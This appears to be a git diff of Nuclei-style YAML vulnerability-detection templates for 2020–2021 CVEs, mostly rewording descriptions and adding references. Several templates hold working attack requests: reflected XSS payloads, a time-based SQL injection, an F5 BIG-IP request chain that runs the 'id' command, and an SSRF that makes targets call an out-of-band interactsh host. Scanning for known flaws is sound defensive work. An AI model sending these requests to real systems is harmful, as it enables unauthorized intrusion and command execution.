severity: medium
|
||||
description: Open redirect vulnerability in b2evolution CMS version prior to 6.11.6 allows an attacker to perform malicious open redirects to an attacker controlled resource via redirect_to parameter in email_passthrough.php.
|
||||
description: b2evolution CMS before 6.11.6 contains an open redirect vulnerability via the redirect_to parameter in email_passthrough.php. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||
reference:
|
||||
- https://github.com/b2evolution/b2evolution/issues/102
|
||||
- http://packetstormsecurity.com/files/161362/b2evolution-CMS-6.11.6-Open-Redirection.html
|
||||
- https://www.exploit-db.com/exploits/49554
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-22840
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -26,3 +27,5 @@ requests:
|
|||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
|
||||
part: header
|
||||
|
||||
# Enhanced by md on 2022/10/13
|
||||
|
|
|
@ -1,13 +1,14 @@
|
|||
id: CVE-2020-23015
|
||||
|
||||
info:
|
||||
name: OPNsense 20.1.5. Open Redirect
|
||||
name: OPNsense <=20.1.5 - Open Redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: An open redirect issue was discovered in OPNsense through 20.1.5. The redirect parameter "url" in login page was not filtered and can redirect user to any website.
|
||||
description: OPNsense through 20.1.5 contains an open redirect vulnerability via the url redirect parameter in the login page, which is not filtered. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||
reference:
|
||||
- https://github.com/opnsense/core/issues/4061
|
||||
- https://www.cvedetails.com/cve/CVE-2020-23015
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-23015
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -26,3 +27,5 @@ requests:
|
|||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
|
||||
|
||||
# Enhanced by md on 2022/10/13
|
||||
|
|
|
@ -1,12 +1,13 @@
|
|||
id: CVE-2020-24550
|
||||
|
||||
info:
|
||||
name: EpiServer <13.2.7 - Open Redirect
|
||||
name: EpiServer Find <13.2.7 - Open Redirect
|
||||
author: dhiyaneshDK
|
||||
severity: medium
|
||||
description: An Open Redirect vulnerability in EpiServer Find before 13.2.7 allows an attacker to redirect users to untrusted websites via the _t_redirect parameter in a crafted URL, such as a /find_v2/_click URL.
|
||||
description: EpiServer Find before 13.2.7 contains an open redirect vulnerability via the _t_redirect parameter in a crafted URL, such as a /find_v2/_click URL. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||
reference:
|
||||
- https://labs.nettitude.com/blog/cve-2020-24550-open-redirect-in-episerver-find/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-24550
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -29,3 +30,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 301
|
||||
|
||||
# Enhanced by md on 2022/10/13
|
||||
|
|
|
@ -0,0 +1,46 @@
|
|||
id: CVE-2020-24902
|
||||
|
||||
info:
|
||||
name: Quixplorer <=2.4.1 - Cross Site Scripting
|
||||
author: edoardottt
|
||||
severity: medium
|
||||
description: |
|
||||
Quixplorer <=2.4.1 is vulnerable to reflected cross-site scripting (XSS) caused by improper validation of user supplied input. A remote attacker could exploit this vulnerability using a specially crafted URL to execute a script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
|
||||
reference:
|
||||
- https://dl.packetstormsecurity.net/1804-exploits/quixplorer241beta-xss.txt
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-24902
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2020-24902
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
google-dork: intitle:"My Download Server"
|
||||
shodan-query: http.title:"My Download Server"
|
||||
verified: "true"
|
||||
tags: cve,cve2020,quixplorer,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/index.php?action=post&order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<script>alert(document.domain)</script>&srt=yes"
|
||||
- "My Download"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,43 @@
|
|||
id: CVE-2020-24903
|
||||
|
||||
info:
|
||||
name: Cute Editor for ASP.NET 6.4 - Cross Site Scripting
|
||||
author: edoardottt
|
||||
severity: medium
|
||||
description: |
|
||||
Cute Editor for ASP.NET 6.4 is vulnerable to reflected cross-site scripting (XSS) caused by improper validation of user supplied input. A remote attacker could exploit this vulnerability using a specially crafted URL to execute a script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
|
||||
reference:
|
||||
- https://seclists.org/bugtraq/2016/Mar/104
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-24903
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2020-24903
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
shodan-query: http.component:"ASP.NET"
|
||||
verified: "true"
|
||||
tags: cve,cve2022,cuteeditor,xss,seclists
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS";><script>alert(document.domain)</script>'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<script>alert(document.domain)</script></p>"
|
||||
- "System.Web"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,43 @@
|
|||
id: CVE-2020-29284
|
||||
|
||||
info:
|
||||
name: Multi Restaurant Table Reservation System 1.0 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: critical
|
||||
description: |
|
||||
The file view-chair-list.php in Multi Restaurant Table Reservation System 1.0 does not perform input validation on the table_id parameter which allows unauthenticated SQL Injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/48984
|
||||
- https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-29284
|
||||
- https://github.com/BigTiger2020/-Multi-Restaurant-Table-Reservation-System/blob/main/README.md
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2020-29284
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve2020,tablereservation,sqli,unauth,edb,cve
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Restaurent Tables"
|
||||
- "Chair List"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -15,7 +15,7 @@ info:
|
|||
cvss-score: 10
|
||||
cve-id: CVE-2020-35489
|
||||
cwe-id: CWE-434
|
||||
tags: cve,cve2020,wordpress,wp-plugin,rce,upload,intrusive
|
||||
tags: cve,cve2020,wordpress,wp-plugin,rce,fileupload,intrusive
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,11 +4,12 @@ info:
|
|||
name: Smartstore <4.1.0 - Open Redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: Smartstore (aka SmartStoreNET) before 4.1.0 allows CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit open redirect.
|
||||
description: Smartstore (aka "SmartStoreNET") before 4.1.0 contains an open redirect vulnerability via CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||
reference:
|
||||
- https://github.com/smartstore/SmartStoreNET/issues/2113
|
||||
- https://www.cvedetails.com/cve/CVE-2020-36365
|
||||
- https://github.com/smartstore/SmartStoreNET
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-36365
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -29,3 +30,5 @@ requests:
|
|||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||
|
||||
# Enhanced by md on 2022/10/14
|
||||
|
|
|
@ -1,10 +1,11 @@
|
|||
id: CVE-2020-6308
|
||||
|
||||
info:
|
||||
name: Unauthenticated Blind SSRF in SAP
|
||||
name: SAP - Unauthenticated Blind SSRF
|
||||
author: madrobot
|
||||
severity: medium
|
||||
description: SAP BusinessObjects Business Intelligence Platform (Web Services) versions - 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability.
|
||||
description: |
|
||||
SAP BusinessObjects Business Intelligence Platform (Web Services) versions - 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability.
|
||||
reference:
|
||||
- https://github.com/InitRoot/CVE-2020-6308-PoC
|
||||
- https://launchpad.support.sap.com/#/notes/2943844
|
||||
|
@ -14,17 +15,25 @@ info:
|
|||
cvss-score: 5.3
|
||||
cve-id: CVE-2020-6308
|
||||
cwe-id: CWE-918
|
||||
tags: cve,cve2020,sap,ssrf,oast,blind
|
||||
tags: cve,cve2020,sap,ssrf,oast,unauth
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- '{{BaseURL}}/AdminTools/querybuilder/logon?framework='
|
||||
- raw:
|
||||
- |
|
||||
POST /AdminTools/querybuilder/logon?framework= HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
body: aps={{interactsh-url}}&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
|
||||
aps={{interactsh-url}}&usr=anything&pwd=anything&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the DNS Interaction
|
||||
words:
|
||||
- "dns"
|
||||
|
||||
- type: word
|
||||
part: location
|
||||
words:
|
||||
- "{{BaseURL}}/AdminTools/querybuilder/logonform.jsp"
|
||||
|
|
|
@ -1,19 +1,17 @@
|
|||
id: CVE-2020-8772
|
||||
|
||||
info:
|
||||
name: WordPress InfiniteWP Client < 1.9.4.5 - Authentication Bypass
|
||||
name: WordPress InfiniteWP <1.9.4.5 - Authorization Bypass
|
||||
author: princechaddha,scent2d
|
||||
severity: critical
|
||||
description: |
|
||||
The InfiniteWP Client plugin before 1.9.4.5 for WordPress has a missing
|
||||
authorization check in iwp_mmb_set_request in init.php. Any attacker who
|
||||
knows the username of an administrator can log in.
|
||||
WordPress InfiniteWP plugin before 1.9.4.5 for WordPress contains an authorization bypass vulnerability via a missing authorization check in iwp_mmb_set_request in init.php. An attacker who knows the username of an administrator can log in, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||
remediation: Upgrade to InfiniteWP 1.9.4.5 or higher.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/10011
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-8772
|
||||
- https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/
|
||||
- https://wpvulndb.com/vulnerabilities/10011
|
||||
remediation: Upgrade to InfiniteWP Client 1.9.4.5 or higher.
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-8772
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -72,3 +70,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/10/19
|
||||
|
|
|
@ -1,15 +1,15 @@
|
|||
id: CVE-2021-1499
|
||||
|
||||
info:
|
||||
name: Cisco HyperFlex HX Data Platform - File Upload Vulnerability
|
||||
name: Cisco HyperFlex HX Data Platform - Arbitrary File Upload
|
||||
author: gy741
|
||||
severity: medium
|
||||
description: A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user.
|
||||
description: Cisco HyperFlex HX Data Platform contains an arbitrary file upload vulnerability in the web-based management interface. An attacker can send a specific HTTP request to an affected device, thus enabling upload of files to the affected device with the permissions of the tomcat8 user.
|
||||
reference:
|
||||
- https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-1499
|
||||
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-upload-KtCK8Ugz
|
||||
- http://packetstormsecurity.com/files/163203/Cisco-HyperFlex-HX-Data-Platform-File-Upload-Remote-Code-Execution.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-1499
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
|
||||
cvss-score: 5.3
|
||||
|
@ -53,3 +53,5 @@ requests:
|
|||
- '"filename:'
|
||||
- '/tmp/passwd9'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/10/20
|
||||
|
|
|
@ -1,15 +1,15 @@
|
|||
id: CVE-2021-20031
|
||||
|
||||
info:
|
||||
name: Sonicwall SonicOS 7.0 - Host Header Injection
|
||||
name: SonicWall SonicOS 7.0 - Open Redirect
|
||||
author: gy741
|
||||
severity: medium
|
||||
description: A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack
|
||||
description: SonicWall SonicOS 7.0 contains an open redirect vulnerability. The values of the Host headers are implicitly set as trusted. An attacker can spoof a particular host header, allowing the attacker to render arbitrary links, obtain sensitive information, modify data, execute unauthorized operations. and/or possibly redirect a user to a malicious site.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/50414
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-20031
|
||||
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0019
|
||||
- http://packetstormsecurity.com/files/164502/Sonicwall-SonicOS-7.0-Host-Header-Injection.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-20031
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -37,3 +37,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/10/14
|
||||
|
|
|
@ -1,15 +1,15 @@
|
|||
id: CVE-2021-22873
|
||||
|
||||
info:
|
||||
name: Revive Adserver < 5.1.0 Open Redirect
|
||||
name: Revive Adserver <5.1.0 - Open Redirect
|
||||
author: pudsec
|
||||
severity: medium
|
||||
description: Revive Adserver before 5.1.0 is vulnerable to open redirects via the dest, oadest, and ct0 parameters of the lg.php and ck.php delivery scripts.
|
||||
description: Revive Adserver before 5.1.0 contains an open redirect vulnerability via the dest, oadest, and ct0 parameters of the lg.php and ck.php delivery scripts. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-22873
|
||||
- https://hackerone.com/reports/1081406
|
||||
- https://github.com/revive-adserver/revive-adserver/issues/1068
|
||||
- http://seclists.org/fulldisclosure/2021/Jan/60
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-22873
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -38,3 +38,5 @@ requests:
|
|||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||
|
||||
# Enhanced by md on 2022/10/14
|
||||
|
|
|
@ -1,16 +1,17 @@
|
|||
id: CVE-2021-22911
|
||||
|
||||
info:
|
||||
name: RocketChat - NoSQL injection
|
||||
name: Rocket.Chat <=3.13 - NoSQL Injection
|
||||
author: tess,sullo
|
||||
severity: critical
|
||||
description: Rocket.Chat server versions 3.11, 3.12 and 3.1 allow unauthenticated access to an API endpoint which leads to NoSQL injection in the database.
|
||||
description: Rocket.Chat 3.11, 3.12 and 3.13 contains a NoSQL injection vulnerability which allows unauthenticated access to an API endpoint. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- http://packetstormsecurity.com/files/162997/Rocket.Chat-3.12.1-NoSQL-Injection-Code-Execution.html
|
||||
- https://github.com/vulhub/vulhub/tree/master/rocketchat/CVE-2021-22911
|
||||
- https://hackerone.com/reports/1130721
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-22911
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22911
|
||||
- https://blog.sonarsource.com/nosql-injections-in-rocket-chat
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-22911
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -47,3 +48,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/10/12
|
||||
|
|
|
@ -1,19 +1,18 @@
|
|||
id: CVE-2021-22986
|
||||
|
||||
info:
|
||||
name: F5 BIG-IP iControl REST - Remote Command Execution
|
||||
name: F5 BIG-IP iControl REST unauthenticated RCE
|
||||
author: rootxharsh,iamnoooob
|
||||
severity: critical
|
||||
description: F5 BIG-IP iControl REST interface is susceptible to an unauthenticated remote command execution vulnerability.
|
||||
description: The iControl REST interface has an unauthenticated remote command execution vulnerability.
|
||||
reference:
|
||||
- https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986
|
||||
- https://support.f5.com/csp/article/K03009991
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22986
|
||||
- http://packetstormsecurity.com/files/162059/F5-iControl-Server-Side-Request-Forgery-Remote-Command-Execution.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-22986
|
||||
tags: bigip,cve,cve2021,rce,mirai,kev
|
||||
tags: bigip,cve,cve2021,rce,kev,packetstorm
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -24,6 +23,7 @@ requests:
|
|||
Authorization: Basic YWRtaW46
|
||||
Content-Type: application/json
|
||||
Cookie: BIGIPAuthCookie=1234
|
||||
Connection: close
|
||||
|
||||
{"username":"admin","userReference":{},"loginReference":{"link":"http://localhost/mgmt/shared/gossip"}}
|
||||
- |
|
||||
|
@ -32,6 +32,7 @@ requests:
|
|||
Accept-Language: en
|
||||
X-F5-Auth-Token: {{token}}
|
||||
Content-Type: application/json
|
||||
Connection: close
|
||||
|
||||
{"command":"run","utilCmdArgs":"-c id"}
|
||||
|
||||
|
@ -43,7 +44,6 @@ requests:
|
|||
group: 1
|
||||
regex:
|
||||
- "([A-Z0-9]{26})"
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
|
@ -56,5 +56,3 @@ requests:
|
|||
- "commandResult"
|
||||
- "uid="
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/05/05
|
||||
|
|
|
@ -1,15 +1,15 @@
|
|||
id: CVE-2021-24165
|
||||
|
||||
info:
|
||||
name: Ninja Forms < 3.4.34 - Administrator Open Redirect
|
||||
name: WordPress Ninja Forms <3.4.34 - Open Redirect
|
||||
author: dhiyaneshDk,daffainfo
|
||||
severity: medium
|
||||
description: |
|
||||
The wp_ajax_nf_oauth_connect AJAX action was vulnerable to open redirect due to the use of a user supplied redirect parameter and no protection in place.
|
||||
WordPress Ninja Forms plugin before 3.4.34 contains an open redirect vulnerability via the wp_ajax_nf_oauth_connect AJAX action, due to the use of a user-supplied redirect parameter and no protection in place. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/6147acf5-e43f-47e6-ab56-c9c8be584818
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24165
|
||||
- https://www.wordfence.com/blog/2021/02/one-million-sites-affected-four-severe-vulnerabilities-patched-in-ninja-forms/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24165
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -41,3 +41,5 @@ requests:
|
|||
- 'status_code_2 == 302'
|
||||
- "contains(all_headers_2, 'Location: https://interact.sh?client_id=1')"
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/10/14
|
||||
|
|
|
@ -1,17 +1,15 @@
|
|||
id: CVE-2021-24210
|
||||
|
||||
info:
|
||||
name: PhastPress < 1.111 - Open Redirect
|
||||
name: WordPress PhastPress <1.111 - Open Redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: |
|
||||
There is an open redirect in the PhastPress WordPress plugin before 1.111 that allows an attacker to malform a request to a page
|
||||
with the plugin and then redirect the victim to a malicious page. There is also a support comment from another user one year
|
||||
ago (https://wordpress.org/support/topic/phast-php-used-for-remote-fetch/) that says that the php involved in the request only
|
||||
go to whitelisted pages but it's possible to redirect the victim to any domain.
|
||||
WordPress PhastPress plugin before 1.111 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/9b3c5412-8699-49e8-b60c-20d2085857fb
|
||||
- https://plugins.trac.wordpress.org/changeset/2497610/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24210
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -29,3 +27,5 @@ requests:
|
|||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|
||||
part: header
|
||||
|
||||
# Enhanced by md on 2022/10/14
|
||||
|
|
|
@ -44,10 +44,10 @@ requests:
|
|||
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
|
||||
Content-Disposition: form-data; name="url"
|
||||
|
||||
|
||||
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
|
||||
Content-Disposition: form-data; name="checkbox"
|
||||
|
||||
|
||||
yes
|
||||
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
|
||||
Content-Disposition: form-data; name="naam"
|
||||
|
|
|
@ -1,13 +1,13 @@
|
|||
id: CVE-2021-24288
|
||||
|
||||
info:
|
||||
name: AcyMailing < 7.5.0 - Open Redirect
|
||||
name: WordPress AcyMailing <7.5.0 - Open Redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: When using acymailing to subscribe to a newsletter, you make a POST request with various parameters. Turning that to a GET request and adding the parameters as GET parameters, you can successfully
|
||||
go through with the subscription.
|
||||
description: WordPress AcyMailing plugin before 7.5.0 contains an open redirect vulnerability due to improper sanitization of the redirect parameter. An attacker turning the request from POST to GET can craft a link containing a potentially malicious landing page and send it to the user.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/56628862-1687-4862-9ed4-145d8dfbca97
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24288
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -25,3 +25,5 @@ requests:
|
|||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|
||||
part: header
|
||||
|
||||
# Enhanced by md on 2022/10/14
|
||||
|
|
|
@ -1,13 +1,14 @@
|
|||
id: CVE-2021-24838
|
||||
|
||||
info:
|
||||
name: AnyComment < 0.3.5 - Open Redirect
|
||||
name: WordPress AnyComment <0.3.5 - Open Redirect
|
||||
author: noobexploiter
|
||||
severity: medium
|
||||
description: |
|
||||
The plugin has an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated first, leading to an Open Redirect issue, which according to the vendor, is a feature.
|
||||
WordPress AnyComment plugin before 0.3.5 contains an open redirect vulnerability via an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/562e81ad-7422-4437-a5b4-fcab9379db82
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24838
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -34,3 +35,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 302
|
||||
|
||||
# Enhanced by md on 2022/10/14
|
||||
|
|
|
@ -1,11 +1,12 @@
|
|||
id: CVE-2021-24940
|
||||
|
||||
info:
|
||||
name: Persian Woocommerce < 5.9.8 - Cross-Site Scripting
|
||||
name: WordPress Persian Woocommerce <=5.8.0 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: |
|
||||
The Persian Woocommerce WordPress plugin through 5.8.0 does not escape the s parameter before outputting it back in an attribute in the admin dashboard, which could lead to a Reflected Cross-Site Scripting issue
|
||||
WordPress Persian Woocommerce plugin through 5.8.0 contains a cross-site scripting vulnerability. The plugin does not escape the s parameter before outputting it back in an attribute in the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and possibly steal cookie-based authentication credentials and launch other attacks.
|
||||
remediation: Fixed in 5.9.8.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/1980c5ca-447d-4875-b542-9212cc7ff77f
|
||||
